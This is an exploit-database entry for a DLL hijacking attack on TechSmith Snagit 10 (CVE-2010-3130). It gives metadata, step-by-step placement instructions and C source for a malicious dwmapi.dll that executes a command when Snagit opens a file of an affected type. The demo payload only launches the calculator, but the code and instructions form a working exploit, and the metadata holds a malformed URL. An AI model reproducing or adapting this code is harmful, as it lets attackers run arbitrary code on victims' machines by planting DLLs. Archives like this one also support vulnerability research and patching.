TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking

Author: Encrypt3d.M!nd
type: local
platform: windows
port: 
date_added: 2010-08-25  
date_updated: 2010-08-25  
verified: 1  
codes: CVE-2010-3130;OSVDB-67479  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comsnagit.exe  

raw file: 14764.c  

/*
TechSmith Snagit 10 (Build 788) Dll Hijacking Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://www.techsmith.com/download/snagittrial.asp

Details:
Compile the following code and rename it to dwmapi.dl
and place file with one of the affected types in the same directory of the dll

Affected types: snag , snagcc , snagprof

Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14764.zip